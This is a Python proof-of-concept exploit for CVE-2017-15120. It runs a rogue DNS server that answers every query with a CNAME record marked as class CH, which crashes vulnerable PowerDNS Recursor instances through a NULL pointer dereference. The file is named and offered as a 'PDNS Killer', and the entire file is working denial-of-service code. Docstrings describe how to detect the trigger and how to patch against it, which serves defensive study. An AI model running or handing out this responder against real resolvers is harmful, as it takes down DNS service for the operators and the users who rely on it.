POC / CVE-2017-15120.py PY
#!/usr/local/bin/python3.6
#CVE-2017-15120 exploit.
#DO NOT ABUSE !!!

import socket

#pip install dnslib
from dnslib import RR, DNSHeader, DNSRecord, QTYPE, CNAME, CLASS


class PDNSKiller:
    """UDP DNS responder reproducing the CVE-2017-15120 trigger condition.

    Every datagram received is parsed as a DNS query and answered with one
    CNAME record whose class is set to CH instead of IN (see craftPayload).

    NOTE(review): the page does not describe the affected product. Per the
    public CVE description, the issue is a NULL pointer dereference in the
    PowerDNS Recursor when it parses an authoritative answer containing a
    CNAME of a class other than IN. Confirm against the vendor advisory,
    which also names the fixed release.

    Defender notes:
      * Detection: an answer-section CNAME with CLASS=CH (3) in reply to an
        IN query is anomalous and can be matched on the wire; unexpected
        resolver restarts are the host-side symptom.
      * Mitigation: run a resolver release that contains the vendor fix.
    """

    def __init__(self, ipaddr):
        """Record the local address to bind; the port is fixed at 53."""
        self.port = 53
        self.host = ipaddr

    def run(self):
        """Bind a UDP socket and answer queries until the process is stopped.

        Exceptions raised while handling a datagram (for example by
        DNSRecord.parse in craftPayload) are not caught, so they end the loop.
        The socket is never closed explicitly.
        """
        listener = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        listener.bind((self.host, self.port))

        print("PDNS Killer Started.")

        while True:
            datagram, peer = listener.recvfrom(8096)
            peer_host, peer_port = peer
            print(f"Received DNS Packet. Client:{peer_host}:{peer_port}")

            reply = self.craftPayload(datagram)
            if reply is None:
                continue
            listener.sendto(reply, (peer_host, peer_port))

    def craftPayload(self, msg):
        """Build the wire-format reply for one raw query.

        Args:
            msg: raw bytes of the received DNS message.

        Returns:
            The packed reply bytes, or None when the reply object's class
            name is not "DNSRecord".
        """
        parsed = DNSRecord.parse(msg)
        answer = parsed.reply()

        record = RR(
            self.getQname(parsed),
            QTYPE.CNAME,
            ttl=60,
            rdata=CNAME("example.com."),
        )

        # The class override is the whole trigger: the CNAME is labelled
        # CH rather than IN. A patched resolver must tolerate this record.
        record.rclass = CLASS.CH

        answer.add_answer(record)

        if type(answer).__name__ != "DNSRecord":
            return None

        banner = "==============================="
        print(banner)
        print(answer)
        print(banner)
        return answer.pack()

    def getQname(self, query):
        """Return the question name of *query* as a string."""
        qname = query.q.qname
        return str(qname)


if __name__ == '__main__':
    # "0.0.0.0" binds every local IPv4 interface; port 53 is fixed by the
    # class and typically needs elevated privileges to bind.
    PDNSKiller("0.0.0.0").run()